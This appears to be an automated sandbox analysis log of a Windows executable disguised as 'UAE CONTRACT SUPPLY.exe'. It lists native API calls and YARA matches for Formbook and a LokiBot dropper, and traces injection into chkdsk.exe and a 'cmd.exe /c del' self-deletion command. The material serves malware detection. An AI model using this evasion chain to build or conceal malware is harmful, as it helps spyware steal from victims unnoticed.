      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022605D0 NtSetInformationThread,1_2_022605D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_1E509660
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5096E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_1E5096E0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509710 NtQueryInformationToken,LdrInitializeThunk,3_2_1E509710
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509FE0 NtCreateMutant,LdrInitializeThunk,3_2_1E509FE0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509780 NtMapViewOfSection,LdrInitializeThunk,3_2_1E509780
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5097A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_1E5097A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509540 NtReadFile,LdrInitializeThunk,3_2_1E509540
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A50 NtCreateFile,LdrInitializeThunk,3_2_1E509A50
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_1E509A00
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A20 NtResumeThread,LdrInitializeThunk,3_2_1E509A20
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509840 NtDelayExecution,LdrInitializeThunk,3_2_1E509840
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509860 NtQuerySystemInformation,LdrInitializeThunk,3_2_1E509860
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5098F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_1E5098F0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_1E509910
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5099A0 NtCreateSection,LdrInitializeThunk,3_2_1E5099A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509650 NtQueryValueKey,3_2_1E509650
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509670 NtQueryInformationProcess,3_2_1E509670
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509610 NtEnumerateValueKey,3_2_1E509610
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5096D0 NtCreateKey,3_2_1E5096D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50A770 NtOpenThread,3_2_1E50A770
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509770 NtSetInformationFile,3_2_1E509770
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509760 NtOpenProcess,3_2_1E509760
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50A710 NtOpenProcessToken,3_2_1E50A710
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509730 NtQueryVirtualMemory,3_2_1E509730
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509560 NtWriteFile,3_2_1E509560
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50AD30 NtSetContextThread,3_2_1E50AD30
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509520 NtWaitForSingleObject,3_2_1E509520
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5095D0 NtClose,3_2_1E5095D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5095F0 NtQueryInformationFile,3_2_1E5095F0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A10 NtQuerySection,3_2_1E509A10
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A80 NtOpenDirectoryObject,3_2_1E509A80
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509B00 NtSetValueKey,3_2_1E509B00
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50A3B0 NtGetContextThread,3_2_1E50A3B0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50B040 NtSuspendThread,3_2_1E50B040
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509820 NtEnumerateKey,3_2_1E509820
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5098A0 NtWriteVirtualMemory,3_2_1E5098A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509950 NtQueueApcThread,3_2_1E509950
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5099D0 NtCreateProcessEx,3_2_1E5099D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00565DCB NtProtectVirtualMemory,3_2_00565DCB
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566266 NtQueryInformationProcess,3_2_00566266
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566455 NtQueryInformationProcess,3_2_00566455
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_0056641E NtQueryInformationProcess,3_2_0056641E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005664FB NtQueryInformationProcess,3_2_005664FB
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005664A4 NtQueryInformationProcess,3_2_005664A4
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566566 NtQueryInformationProcess,3_2_00566566
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_0056626E NtQueryInformationProcess,3_2_0056626E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566629 NtQueryInformationProcess,3_2_00566629
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005662C5 NtQueryInformationProcess,3_2_005662C5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005662EA NtQueryInformationProcess,3_2_005662EA
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_0056629C NtQueryInformationProcess,3_2_0056629C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566335 NtQueryInformationProcess,3_2_00566335
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005663F8 NtQueryInformationProcess,3_2_005663F8
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005663A0 NtQueryInformationProcess,3_2_005663A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005663AA NtQueryInformationProcess,3_2_005663AA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9540 NtReadFile,LdrInitializeThunk,16_2_056F9540
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F95D0 NtClose,LdrInitializeThunk,16_2_056F95D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9710 NtQueryInformationToken,LdrInitializeThunk,16_2_056F9710
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9FE0 NtCreateMutant,LdrInitializeThunk,16_2_056F9FE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9780 NtMapViewOfSection,LdrInitializeThunk,16_2_056F9780
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_056F9660
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9650 NtQueryValueKey,LdrInitializeThunk,16_2_056F9650
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_056F96E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F96D0 NtCreateKey,LdrInitializeThunk,16_2_056F96D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_056F9910
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F99A0 NtCreateSection,LdrInitializeThunk,16_2_056F99A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_056F9860
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9840 NtDelayExecution,LdrInitializeThunk,16_2_056F9840
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A50 NtCreateFile,LdrInitializeThunk,16_2_056F9A50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9560 NtWriteFile,16_2_056F9560
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9520 NtWaitForSingleObject,16_2_056F9520
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FAD30 NtSetContextThread,16_2_056FAD30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F95F0 NtQueryInformationFile,16_2_056F95F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9760 NtOpenProcess,16_2_056F9760
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FA770 NtOpenThread,16_2_056FA770
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9770 NtSetInformationFile,16_2_056F9770
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9730 NtQueryVirtualMemory,16_2_056F9730
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FA710 NtOpenProcessToken,16_2_056FA710
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F97A0 NtUnmapViewOfSection,16_2_056F97A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9670 NtQueryInformationProcess,16_2_056F9670
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9610 NtEnumerateValueKey,16_2_056F9610
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9950 NtQueueApcThread,16_2_056F9950
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F99D0 NtCreateProcessEx,16_2_056F99D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FB040 NtSuspendThread,16_2_056FB040
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9820 NtEnumerateKey,16_2_056F9820
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F98F0 NtReadVirtualMemory,16_2_056F98F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F98A0 NtWriteVirtualMemory,16_2_056F98A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9B00 NtSetValueKey,16_2_056F9B00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FA3B0 NtGetContextThread,16_2_056FA3B0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A20 NtResumeThread,16_2_056F9A20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A00 NtProtectVirtualMemory,16_2_056F9A00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A10 NtQuerySection,16_2_056F9A10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A80 NtOpenDirectoryObject,16_2_056F9A80
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF81B0 NtCreateFile,16_2_00CF81B0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF82E0 NtClose,16_2_00CF82E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF8260 NtReadFile,16_2_00CF8260
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF8390 NtAllocateVirtualMemory,16_2_00CF8390
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF82DA NtClose,16_2_00CF82DA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF825A NtReadFile,16_2_00CF825A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF838A NtAllocateVirtualMemory,16_2_00CF838A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_004013481_2_00401348
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0040139A1_2_0040139A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58D6163_2_1E58D616
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E6E303_2_1E4E6E30
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E592EF73_2_1E592EF7
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E591FF13_2_1E591FF1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58D4663_2_1E58D466
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D841F3_2_1E4D841F
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E591D553_2_1E591D55
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E592D073_2_1E592D07
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C0D203_2_1E4C0D20
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5925DD3_2_1E5925DD
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DD5E03_2_1E4DD5E0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F25813_2_1E4F2581
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5922AE3_2_1E5922AE
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E592B283_2_1E592B28
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58DBD23_2_1E58DBD2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FEBB03_2_1E4FEBB0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5810023_2_1E581002
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5928EC3_2_1E5928EC
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB0903_2_1E4DB090
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A03_2_1E4F20A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5920A83_2_1E5920A8
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CF9003_2_1E4CF900
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E41203_2_1E4E4120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05781D5516_2_05781D55
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B0D2016_2_056B0D20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05782D0716_2_05782D07
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CD5E016_2_056CD5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057825DD16_2_057825DD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E258116_2_056E2581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577D46616_2_0577D466
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C841F16_2_056C841F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05781FF116_2_05781FF1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578DFCE16_2_0578DFCE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D6E3016_2_056D6E30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577D61616_2_0577D616
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05782EF716_2_05782EF7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D412016_2_056D4120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BF90016_2_056BF900
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578E82416_2_0578E824
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA83016_2_056DA830
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577100216_2_05771002
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057828EC16_2_057828EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A016_2_056E20A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057820A816_2_057820A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB09016_2_056CB090
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAB4016_2_056DAB40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05782B2816_2_05782B28
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577DBD216_2_0577DBD2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057703DA16_2_057703DA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EEBB016_2_056EEBB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0576FA2B16_2_0576FA2B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057822AE16_2_057822AE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFC87816_2_00CFC878
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFCBE616_2_00CFCBE6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFCBE316_2_00CFCBE3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE8C5016_2_00CE8C50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE8C0A16_2_00CE8C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE2D9016_2_00CE2D90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB5BB16_2_00CFB5BB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE2FB016_2_00CE2FB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 056BB150 appears 54 times
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: String function: 1E4CB150 appears 35 times
      Source: UAE CONTRACT SUPPLY.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.390017315.0000000002C30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVrdihftetgo6.exeFE2XTred6 vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389503842.0000000002230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514676013.00000000000B6000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000000.388321692.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519498317.000000001DED0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.515245595.0000000002460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exeBinary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/0@10/4
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1068:120:WilError_01
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile created: C:\Users\user\AppData\Local\Temp\~DF36513EDB16C1AC61.TMPJump to behavior
      Source: UAE CONTRACT SUPPLY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: UAE CONTRACT SUPPLY.exeVirustotal: Detection: 33%
      Source: UAE CONTRACT SUPPLY.exeReversingLabs: Detection: 36%
      Source: unknownProcess created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'Jump to behavior
